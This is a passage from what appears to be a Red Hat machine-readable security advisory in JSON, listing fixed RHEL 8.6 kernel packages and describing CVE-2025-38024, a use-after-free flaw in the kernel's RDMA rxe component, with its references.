            "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "kernel: RDMA/rxe: Fix incomplete state save in rxe_requester"
    },
    {
      "cve": "CVE-2025-38024",
      "cwe": {
        "id": "CWE-825",
        "name": "Expired Pointer Dereference"
      },
      "discovery_date": "2025-06-18T00:00:00+00:00",
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2373354"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the Linux kernel\u0027s Remote Direct Memory Access (RDMA) subsystem, specifically within the `rxe` component. This use-after-free vulnerability occurs in the `rxe_create_cq` function. When the `rxe_cq_from_init` function fails, the subsequent call to `rxe_cleanup` attempts to free memory resources that have already been released, leading to memory corruption. A local attacker with high privileges could exploit this flaw to cause a denial of service or potentially achieve arbitrary code execution.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "kernel: Linux kernel: RDMA/rxe use-after-free vulnerability leading to potential arbitrary code execution",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src",
          "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src",
          "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-38024"
        },
        {
          "category": "external",
          "summary": "RHBZ#2373354",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373354"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-38024",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-38024"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-38024",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38024"
        },
        {
          "category": "external",
